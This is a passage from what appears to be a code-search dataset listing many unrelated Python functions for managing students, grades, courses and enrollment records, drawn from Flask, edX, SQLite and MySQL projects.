_save_section_scores(self, section_scores):\n l = []\n for section in section_scores:\n d = {\n 'name': section['name'],\n 'score': section['auto_score'],\n 'max_score': section['max_score'],\n\t\t'failed_tests': section['failed_tests']\n }\n l.append(d)\n self.student_section_scores = l", "def get_students(self, student_file_info):\n students_file = os.path.join(self.path, \"students.txt\")\n sep, header = student_file_info\n try:\n for student in file_reading_gen(students_file, 3, sep, header):\n # CWID | Name | Major\n cwid = student[0]\n name = student[1]\n major = student[2]\n self.students[cwid] = Student(cwid, name, major)\n except ValueError:\n raise ValueError(\"Invalid data in students.txt\")\n except FileNotFoundError as e:\n print('Missing students.txt.\\n' + str(e))", "def students(self):\n return self._parser.students", "def _create_students_with_state(self, num_students, state=None, grade=0, max_grade=1):\r\n self.define_option_problem(PROBLEM_URL_NAME)\r\n students = [\r\n UserFactory.create(username='robot%d' % i, email='robot+test+%d@edx.org' % i)\r\n for i in xrange(num_students)\r\n ]\r\n for student in students:\r\n CourseEnrollmentFactory.create(course_id=self.course.id, user=student)\r\n StudentModuleFactory.create(course_id=self.course.id,\r\n module_state_key=self.location,\r\n student=student,\r\n grade=grade,\r\n max_grade=max_grade,\r\n state=state)\r\n return students", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n rows = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows)\n # return html", "def __str__(self):\n return str(self.__student_name) + \" has grade \" + str(self.__grade_value) + \" at \" + str(self.__discipline_name)", "def create_student(faculty: str) -> None:\r\n global usernames, pointer, student_file_info\r\n username = usernames[pointer]\r\n password = username[:6][::-1]\r\n student_file_info.append([username, password, faculty])\r\n pointer += 1", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def _gradesets_and_errors_for(self, course_id, students):\r\n students_to_gradesets = {}\r\n students_to_errors = {}\r\n\r\n for student, gradeset, err_msg in iterate_grades_for(course_id, students):\r\n students_to_gradesets[student] = gradeset\r\n if err_msg:\r\n students_to_errors[student] = err_msg\r\n\r\n return students_to_gradesets, students_to_errors", "def AddStudent(self, event):\n pass", "def student_view_data(self):\n def get_student_profile_data():\n # pylint: disable=no-member\n \"\"\"\n Returns profile data for all students on the course.\n \"\"\"\n try:\n regexp_string = self.regexp_from_users_included_email(self.users_included_email)\n re.compile(regexp_string)\n users = self.students_for_course(regexp_string)\n except:\n log.info(\"regexp is invalid: '%s'\", regexp_string)\n users = []\n\n for user in users:\n student_id = anonymous_id_for_user(user, self.course_id)\n profile = user.profile\n\n vip = self.get_vip(user)\n image_url = None\n if vip:\n image_url = \"https://my.imd.org/api/profile/{}/profile-picture-header\".format(vip)\n else:\n if self.is_course_staff:\n image_url = self.runtime.local_resource_url(self, 'public/images/profile-picture-header-no-vip.gif')\n else:\n image_url = self.runtime.local_resource_url(self, 'public/images/profile-picture-header.gif')\n\n cohort_name = None\n if (self.is_course_cohorted(self.course_id)):\n cohort_name = self.get_cohort(user, self.course_id).name\n\n yield {\n 'student_id': student_id,\n 'username': user.username,\n 'fullname': profile.name,\n 'vip': vip,\n 'image_url': image_url,\n 'email': user.email,\n 'cohort_name': cohort_name,\n }\n\n return {\n 'student_profile_list': list(get_student_profile_data()),\n 'display_name': self.display_name,\n 'username': self.logged_in_username,\n 'course_is_cohorted': self.enable_cohorts and self.is_course_cohorted(self.course_id),\n 'profile_display': {\n 'profile_display_job_title': self.profile_display_job_title,\n 'profile_display_organisation': self.profile_display_organisation,\n 'profile_display_work_country': self.profile_display_work_country,\n 'profile_display_email_button': self.profile_display_email_button,\n 'profile_display_bio': self.profile_display_bio,\n },\n }", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def import_previous_grades_into_db(year, semester, db_name='./grades.sqlite3', filename='./grades.xls'):\n if not os.path.isfile(db_name):\n raise Exception(\"DB not found\")\n\n df1 = pd.read_excel(filename)\n\n try:\n cls = df1.filter(like='CL')\n except Exception as e:\n print(e)\n cls = None # no CLA's found\n\n try:\n ols = df1.filter(like='OL')\n except Exception as e:\n print(e)\n ols = None # no OLAs found\n\n try:\n ids = df1.filter(like='sername').values.ravel().tolist()\n ids_len = len(ids)\n except Exception as e:\n print('Was not able to parse user ids, check xls file you are trying to import: ', e)\n raise e # may be improved in the future - strange case\n try:\n names = df1.filter(like='Name').values.ravel().tolist()\n except Exception as e: # either does not exist or has different name\n print(e)\n names = None\n\n class_dict = get_ids_in_class_by_year_semester(year, semester, db_name)\n\n if (not class_dict and not names) or (class_dict and len(class_dict) < ids_len and not names):\n raise Exception('Did not find ids in table CLASS and did not find names in xls file')\n elif names and (not class_dict or (class_dict and len(class_dict) < ids_len)):\n print('Did not find existing students, but found names in xsl\\nAdding new students...\\n')\n existing_ids = get_pipeline_ids(db_name)\n need_to_update_students = False\n # otherwise just add ids to the class list\n if existing_ids:\n for sid in ids:\n if sid not in existing_ids:\n need_to_update_students = True\n else:\n need_to_update_students = True\n\n if need_to_update_students:\n fname, lname = zip(*(name.split(', ') for name in names))\n fname = (name.strip() for name in fname)\n lname = (name.strip() for name in lname)\n insert_students(ids, fname, lname, db_name)\n register_students_in_class(ids, year, semester, db_name)\n\n class_ids = [class_dict[sid] for sid in ids]\n if ols is None and cls is None or len(class_ids) == 0:\n raise Exception('No grades to load')\n\n grades_tupples = list()\n if ols is not None:\n for lab_name in ols:\n grades = (str(grade) for grade in ols[lab_name].values)\n grades_tupples += list(zip(class_ids, [lab_name] * ids_len, [-1] * ids_len, grades, ['TRUE'] * ids_len))\n\n if cls is not None:\n for lab_name in cls:\n grades = (str(grade) for grade in cls[lab_name].values)\n grades_tupples += list(zip(class_ids, [lab_name] * ids_len, [-1] * ids_len, grades, ['TRUE'] * ids_len))\n\n with lite.connect(db_name) as con:\n cur = con.cursor()\n cur.executemany('INSERT OR REPLACE INTO grades\\\n (class_id, lab, attempt, grade, pass_fail) VALUES (?, ?, ?, ?, ?)', grades_tupples)\n con.commit()", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n project_list = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n project_list=project_list)", "def grade(self, grade_number: int):\n return self.students.setdefault(grade_number, [])", "def view_student_gradebook():\n\n user_id = session.get('user_id')\n courses = []\n grades = []\n con = db.get_db()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT DISTINCT courses.course_id, (ROUND(sum(grades.points_received)/sum(grades.total_points), 2 )*100)\n as total_grade, roster.session_id as class_session,\n courses.name as class_name, users.name AS teacher_name, grades.student_id\n FROM courses JOIN sessions on courses.course_id = sessions.course_id\n\t\t\t\t JOIN users on courses.teacherid= users.id\n JOIN assignments on assignments.session_id = sessions.id\n JOIN grades on grades.assignment_id = assignments.assignment_id\n JOIN roster on roster.session_id = sessions.id\n WHERE grades.student_id = %s\n\t GROUP BY grades.student_id, roster.session_id, courses.course_id, users.id\"\"\",\n (user_id,))\n courses = cur.fetchall()\n\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/student_view.html\", courses=courses)", "def added_student():\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n first, last, github = hackbright.get_student_by_github(github)\n\n html = render_template(\"student_added.html\", first=first, last=last, github=github)\n\n return html", "def _save_grade(self):\r\n student = self._student('POST', key='grader_id')\r\n if student is None:\r\n self._error_response()\r\n\r\n else:\r\n # Update the number of essays the student has graded\r\n student.grade_peer_essay()\r\n return self._success_response({})", "def all_students(records):\n \n student_number_and_name = {}\n for each_tuple in records:\n all_student_information = each_tuple[1]\n student_number = int(all_student_information[0])\n student_name = (all_student_information[1:3])\n \n student_number_and_name[student_number] = student_name\n \n return student_number_and_name", "def get_student_name(self):\n return self.__student_name", "def add_students(self):\n if(self.Roll_No_var.get()==\"\" or self.name_var.get()==\"\" or self.gender_var.get()==\"\" or self.contact_var.get()==\"\" or self.email_var.get()==\"\" or self.dob_var.get()==\"\" or self.pref1.get()==\"\" or self.pref2.get()==\"\" or self.pref3.get()==\"\" or self.type.get()==\"\" or self.rank.get()==\"\" or self.marks.get()==\"\"):\n messagebox.showerror(\"Error\",\"All fields are Required!!\")\n else:\n con = pymysql.connect(host=\"localhost\",user=\"root\",password=\"mysqlrootpasswordhere\",database=\"demodb\")\n cursor = con.cursor()\n try:\n cursor.execute(\"insert into STDB values(%s,%s,%s,%s,%s,%s,%s,%s)\",(self.Roll_No_var.get(),\n self.name_var.get(),\n self.email_var.get(),\n self.gender_var.get(),\n self.contact_var.get(),\n self.dob_var.get(),\n self.txt_Address.get(\"1.0\",END),\n self.stud_id_var.get()\n ))\n cursor.execute(\"insert into preference values(%s,%s,%s,%s)\",(self.Roll_No_var.get(),\n self.pref1.get(),\n self.pref2.get(),\n self.pref3.get()))\n cursor.execute(\"insert into qualification values(%s,%s,%s,%s)\",(self.Roll_No_var.get(),\n self.type.get(),\n self.rank.get(),\n self.marks.get()))\n \n con.commit()\n self.fetch_data()\n self.clear()\n con.close()\n messagebox.showinfo(\"Success\",\"Record has been Inserted\")\n except pymysql.err.InternalError:\n messagebox.showerror(\"Error\",\"App_id,Qualification rank , Qualification Marks Should be Integer\")\n self.Roll_No_var.set(\"\")\n self.rank.set(\"\")\n self.marks.set(\"\")\n except pymysql.err.IntegrityError:\n messagebox.showerror(\"Error\",\"Application Id is Already Exist Use Different Application Id\")\n self.Roll_No_var.set(\"\")", "def __init__(self, idy, name):\n self.idy = idy\n self.name = name\n self.active = True\n self.grades = {}", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def create_student(**student):\n\n _student = dict.fromkeys(\n ['first_name', 'last_name', 'middle_initial', 'address', 'email', 'phone_number'])\n\n _student['first_name'] = student.get('first_name', 'N/A')\n _student['last_name'] = student.get('last_name', 'N/A')\n _student['middle_initial'] = student.get('middle_initial', 'N/A')\n\n _student['address'] = student.get('address', 'N/A')\n _student['email'] = student.get('email', 'N/A')\n _student['phone_number'] = student.get('phone_number', 'N/A')\n\n return _student", "def addStud(self,ID,name,attNr,grade):\n if ID < 0: raise Exception(\"Invalid ID!\")\n parts = name.split(' ')\n if len(parts) < 2: raise Exception('Invalid name!')\n for part in parts:\n if len(part)<3: raise Exception('Invalid name!')\n if attNr < 0: raise Exception('Invalid number of attendances!')\n if grade not in range(0,11): raise Exception('Invalid grade!')\n self.__studRepo.add(Student(ID,name,attNr,grade))", "async def school(self, ctx:commands.Context, *school_name):\r\n\r\n school_name = ' '.join(school_name)\r\n if not school_name in list(self.fish_schools.keys()):\r\n await ctx.send(f'{school_name} is not a valid school')\r\n return\r\n\r\n curr_school = self.fish_schools[school_name]\r\n member_school = (await self.config.member(ctx.message.author).schools()).get(school_name, {})\r\n description = ''\r\n for i in curr_school:\r\n description += (f'{i}: {member_school[i]} inches' if i in member_school else '???') + '\\n'\r\n embed = Embed(title=school_name, description=description[:-1])\r\n embed.set_thumbnail(url=schools_image)\r\n await ctx.send(embed=embed)", "def __init__(self, first, last, email, grade):\n self.first_name = first\n self.last_name = last\n self.email = email\n self.grade = grade", "def createStudent(self):\n self.createProfile()\n from soc.modules.gsoc.models.profile import GSoCStudentInfo\n properties = {'key_name': self.profile.key().name(), 'parent': self.profile}\n self.profile.student_info = seeder_logic.seed(GSoCStudentInfo, properties)\n self.profile.put()", "def prepare_student_data(self) -> dict:\n self._filename_pre_data()\n empty_student = {}\n empty_student[\"scoreTimestamp\"] = \"N/A\"\n for i in self.draft_out:\n empty_student[i] = \"N/A\"\n for i in self.pre_data:\n empty_student[i] = self.pre_data[i]\n self.pre_data = empty_student", "def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)", "def get_grades(self, student):\n try:\n return self.grades[student.id][:] # notice that a copy is returned\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)", "def create_students():\n\n\t# create empty list\n\tstudent_list = []\n\n\t# import student classces\n\tstudent_list = create_student_class()\n\n\treturn student_list", "def get_student_grade_summary_data(request, course, get_grades=True, get_raw_scores=False, use_offline=False):\r\n course_key = course.id\r\n enrolled_students = User.objects.filter(\r\n courseenrollment__course_id=course_key,\r\n courseenrollment__is_active=1,\r\n ).prefetch_related(\"groups\").order_by('username')\r\n\r\n header = [_('ID'), _('Username'), _('Full Name'), _('edX email'), _('External email')]\r\n\r\n datatable = {'header': header, 'students': enrolled_students}\r\n data = []\r\n\r\n gtab = GradeTable()\r\n\r\n for student in enrolled_students:\r\n datarow = [student.id, student.username, student.profile.name, student.email]\r\n try:\r\n datarow.append(student.externalauthmap.external_email)\r\n except: # ExternalAuthMap.DoesNotExist\r\n datarow.append('')\r\n\r\n if get_grades:\r\n gradeset = student_grades(student, request, course, keep_raw_scores=get_raw_scores, use_offline=use_offline)\r\n log.debug('student={0}, gradeset={1}'.format(student, gradeset))\r\n with gtab.add_row(student.id) as add_grade:\r\n if get_raw_scores:\r\n # TODO (ichuang) encode Score as dict instead of as list, so score[0] -> score['earned']\r\n for score in gradeset['raw_scores']:\r\n add_grade(score.section, getattr(score, 'earned', score[0]))\r\n else:\r\n for grade_item in gradeset['section_breakdown']:\r\n add_grade(grade_item['label'], grade_item['percent'])\r\n student.grades = gtab.get_grade(student.id)\r\n\r\n data.append(datarow)\r\n\r\n # if getting grades, need to do a second pass, and add grades to each datarow;\r\n # on the first pass we don't know all the graded components\r\n if get_grades:\r\n for datarow in data:\r\n # get grades for student\r\n sgrades = gtab.get_grade(datarow[0])\r\n datarow += sgrades\r\n\r\n # get graded components and add to table header\r\n assignments = gtab.get_graded_components()\r\n header += assignments\r\n datatable['assignments'] = assignments\r\n\r\n datatable['data'] = data\r\n return datatable", "def _enroll_students_in_course(self, course_id, num_students):\r\n\r\n for _ in range(num_students):\r\n random_id = uuid4().hex[:8]\r\n self.create_student(username='student{0}'.format(random_id))", "def insert_students(ids, fname, lname, db_name='./grades.sqlite3'):\n names_tupple = list(zip(ids, fname, lname, [0] * len(ids)))\n with lite.connect(db_name) as con:\n cur = con.cursor()\n cur.executemany('INSERT OR REPLACE INTO STUDENTS \\\n (pipeline_id, first_name, second_name, cheating_ratio)'\n ' VALUES (?, ?, ?, ?)', names_tupple)\n con.commit()", "def __str__(self):\n return \"student:\"+str(self.name)+\":\"+str(self.age)+\":\"+str(self.major)", "def get_student():\n\n github = request.args.get('github')\n if not github:\n return \"Please enter a student!\"\n\n student = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n if not student:\n return \"There is no student with github \\\"{}\\\".\".format(github)\n\n first, last, github = student\n # return \"{acct} is the GitHub account for {first} {last}\".format(\n # acct=github, first=first, last=last)\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n return html", "def addStudent():\n name = input(\"Name: \")\n number = input(\"Number: \")\n gpa = input(\"GPA: \")\n field = input(\"Field: \")\n student = Student(name, number, gpa, field)\n if t.insert(number, student):\n ht.insert(student)\n print(name, \"added successfully.\")\n else:\n print(\"student number is not valid.\")", "def __init__(self,student_id,lname,fname, major='Computer Science',gpa='0.0'):\n super().__init__(lname,fname) # Call init on parent class\n self._student_id = student_id\n self._major = major\n self._gpa = gpa", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"INSERT INTO Students VALUES(?,?,?)\"\"\"\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def __init__(self, name):\n self.name = name\n self.maxidy = -1\n self.studentlist = []", "def get_all_grades(first_name, last_name):\n QUERY = \"\"\" SELECT s.first_name, s.last_name, g.project_title, g.grade \n FROM Students AS s \n INNER JOIN Grades AS g ON s.github = g.student_github\n WHERE s.first_name = ? AND s.last_name = ? \"\"\"\n db_cursor.execute(QUERY, (first_name, last_name))\n grades_data = db_cursor.fetchone()\n print grades_data[-1]", "def get_list_of_students(self):\n return self._students", "def __init__(self, name, ssn, address, courses_grades=None):\n super().__init__(name, ssn, address)\n if courses_grades is None:\n courses_grades = []\n if courses_grades == isinstance(courses_grades, list):\n self.courses_grades = courses_grades\n else:\n self.courses_grades = list(courses_grades)", "def __init__(self, name, age, student_id, courses):\n self.name = name\n self.age = age\n self.student_id = student_id\n self.courses = courses\n\n # When adding a student, increment the\n # class variable student_count\n Student.student_count += 1", "def print_students_gpa(std):\n print (\"Student Id:\", get_id(std))\n print (\"Student name:\", get_fname(get_name(std)), get_lname(get_name(std)))\n print (\"GPA: %.2f\" %(calc_gpa(std)))", "def student_state(self):\n submission = self.get_submission()\n if submission:\n uploaded_submission = submission.get(\"answer\").get(\"filename\", None)\n if uploaded_submission:\n uploaded = {\"filename\": submission['answer']['filename']}\n else:\n uploaded = None\n else:\n uploaded = None\n\n submission = self.get_question()\n if submission:\n uploaded_submission = submission.get(\"question\").get(\"filename\", None)\n if uploaded_submission:\n quploaded = {\"filename\": submission['question']['filename']}\n else:\n quploaded = None\n else:\n quploaded = None\n\n submission = self.get_solution()\n if submission:\n uploaded_submission = submission.get(\"solution\").get(\"filename\", None)\n if uploaded_submission:\n suploaded = {\"filename\": submission['solution']['filename']}\n else:\n suploaded = None\n else:\n suploaded = None\n \n \n \n return {\n \"display_name\": self.title,\n \"question\":self.question,\n \"uploaded\": uploaded,\n \"quploaded\":quploaded,\n \"suploaded\":suploaded,\n \"raw_answer\":self.raw_answer,\n \"raw_question\":self.raw_question,\n \"score\": self.score,\n \"weight\":self.weight,\n \"attempts\": self.attempts,\n \"max_attempts\": self.max_attempts,\n }", "def add_student():\n # import pdb; pdb.set_trace()\n if request.method == \"POST\":\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n\n html = render_template(\"added_student_confirmation.html\",\n first=first,\n last=last,\n github=github)\n\n return html", "def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()", "def get_edu_fields():\n edu_hs_men_fields = [\n 'B15002_003E', #\tMale:!!No schooling completed\t\n 'B15002_004E', #\tMale:!!Nursery to 4th grade\t\n 'B15002_005E', #\tMale:!!5th and 6th grade\t\n 'B15002_006E', #\tMale:!!7th and 8th grade\t\n 'B15002_007E', #\tMale:!!9th grade\t\n 'B15002_008E', #\tMale:!!10th grade\t\n 'B15002_009E', #\tMale:!!11th grade\t\n 'B15002_010E', #\tMale:!!12th grade, no diploma\t\n 'B15002_011E', #\tMale:!!High school graduate (includes equivalency)\n ]\n edu_hs_women_fields = [\n 'B15002_020E', #\tFemale:!!No schooling completed\t\n 'B15002_021E', #\tFemale:!!Nursery to 4th grade\t\n 'B15002_022E', #\tFemale:!!5th and 6th grade\t\n 'B15002_023E', #\tFemale:!!7th and 8th grade\t\n 'B15002_024E', #\tFemale:!!9th grade\t\n 'B15002_025E', #\tFemale:!!10th grade\t\n 'B15002_026E', #\tFemale:!!11th grade\t\n 'B15002_027E', #\tFemale:!!12th grade, no diploma\t\n 'B15002_028E', #\tFemale:!!High school graduate (includes equivalency)\t\n ]\n edu_some_college_men_fields = [\n 'B15002_012E', #\tMale:!!Some college, less than 1 year\t\n 'B15002_013E', #\tMale:!!Some college, 1 or more years, no degree\t\n 'B15002_014E', #\tMale:!!Associate's degree\t\n ]\n edu_some_college_women_fields = [\n 'B15002_029E', #\tFemale:!!Some college, less than 1 year\t\n 'B15002_030E', #\tFemale:!!Some college, 1 or more years, no degree\t\n 'B15002_031E', #\tFemale:!!Associate's degree\n ]\n edu_college_men_fields = [\n 'B15002_015E', #\tMale:!!Bachelor's degree\n ]\n edu_college_women_fields = [\n 'B15002_032E', #\tFemale:!!Bachelor's degree\n ]\n edu_postgrad_men_fields = [\n 'B15002_016E', #\tMale:!!Master's degree\n 'B15002_018E', #\tMale:!!Doctorate degree\n ]\n edu_postgrad_women_fields = [\n 'B15002_033E', #\tFemale:!!Master's degree\n 'B15002_035E', #\tFemale:!!Doctorate degree\t\n ]\n\n edu_fields = OrderedDict()\n\n return edu_fields", "def see_course_students(self, username: str, token: str, course_abbreviation: str) -> List[Tuple[str, float]]:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Query database for all courses\n cursor.execute(\n '''\n SELECT \n uid,\n grade\n FROM \n enrollment_records\n WHERE\n course_id = ?\n ;\n ''', (course_id,))\n db_results = cursor.fetchall()\n\n # If no courses are available\n if db_results is None or len(db_results) == 0:\n return []\n\n # Build information dicts for every student enrolled in this course\n students = []\n for result in db_results:\n # Get the student's username (we don't want to be giving UIDs)\n student_name = self.get_username(result[0])\n\n # Build a course dict from the data\n students.append({\n \"name\": student_name,\n \"grade\": float(result[1])\n })\n\n # Return list of student info dictionaries\n return students", "def getGrades(self,student):\n try:\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError('Student not in grade book')", "def get_student_info(file, **kwargs):\n go = True\n storage = []\n for key, value in kwargs.items():\n storage.append(\"%s = %s\" % (key, value))\n score = '0'\n while go:\n score = input('Enter test score, or -1 to finish')\n if score.isdigit() and 0 <= int(score) <= 100:\n storage.append(score)\n elif score == '-1':\n go = False\n else:\n print('invalid input')\n write_to_file(str(storage) + '\\n', file)", "def add_students_to_table(students):\n for student_name, points in students.items():\n try:\n Student.create(username=student_name, points=points)\n except IntegrityError: # IntError occurs when username already exists\n student_record = Student.get(username=student_name)\n if student_record.points != points:\n student_record.points = points\n student_record.save()", "def add_row(self, student_id):\r\n self._current_row = {}\r\n yield self._add_grade_to_row\r\n self.grades[student_id] = self._current_row", "def AddStudent(self, student_name):\n self.__data['s'].AddItems([Student(self.__data['s'].GetSafeKey(), student_name)])\n self.__undo_list.append(['s'])\n self.__redo_list.clear()", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)", "def getGrades(self, student):\n try: #return copy of list of student's grades\"\"\"\n return self.grades[student.getIdNum()][:]\n except:\n raise ValueError('Student not in mapping')", "def student(self):\n if \"student\" in self._prop_dict:\n if isinstance(self._prop_dict[\"student\"], OneDriveObjectBase):\n return self._prop_dict[\"student\"]\n else :\n self._prop_dict[\"student\"] = EducationStudent(self._prop_dict[\"student\"])\n return self._prop_dict[\"student\"]\n\n return None", "def assign_grade(github, title, grade):\n QUERY = \"\"\"\n INSERT INTO Grades VALUES (?, ?, ?)\n \"\"\"\n\n db_cursor.execute(QUERY, (github, title, grade))\n db_connection.commit()\n\n print \"Successfully graded %s with a %s on %s\" % (github, grade, title)", "def get_student_profile(request):\n profile = get_profile_of_current_user()\n\n response = profile.json_data()\n response['is_student'] = True\n response['is_grad_student'] = is_grad_student()\n\n campuses = get_main_campus(request)\n if 'Seattle' in campuses:\n response['campus'] = 'Seattle'\n elif 'Tacoma' in campuses:\n response['campus'] = 'Tacoma'\n elif 'Bothell' in campuses:\n response['campus'] = 'Bothell'\n\n get_academic_info(request, response)\n\n return response", "def make_new_student(first_name, last_name, github):\n\n QUERY = \"\"\"INSERT INTO Students VALUES (?, ?, ?)\"\"\"\n # Query...all caps as a constant here, a string that will not change, (and only in the scope of this function!)\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"\n INSERT INTO Students VALUES(?, ?, ?)\"\"\"\n \n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def __init__(self, student):\n pass", "def __statistics_best_situation(self):\n students_list = self.__grade_controller.get_list_of_students_with_best_situation()\n if len(students_list) == 0:\n print(\"There is no student with a grade!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")", "def assigned_exercises(self):\n\n exercises = dict()\n\n with sqlite3.connect(self.db_path) as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select\n e.id ExerciseId,\n e.name,\n s.id,\n s.first_name,\n s.last_name\n from exercises e\n join student_exercises se on se.exercise_id = e.id\n join students s on s.id = se.student_id\n \"\"\")\n\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n exercise_id = row[0]\n exercise_name = row[1]\n student_id = row[2]\n student_name = f'{row[3]} {row[4]}'\n \n if exercise_name not in exercises:\n exercises[exercise_name] = [student_name]\n # {\"Kennel\": [\"Brian Cravens\"]}\n else:\n exercises[exercise_name].append(student_name)\n # {\"Kennel\": [\"Brian Cravens\", \"Joe Montana\"]}\n for exercise_name, students in exercises.items():\n print(f'\\n{exercise_name}')\n for student in students:\n print(f'\\t* {student}')" ]
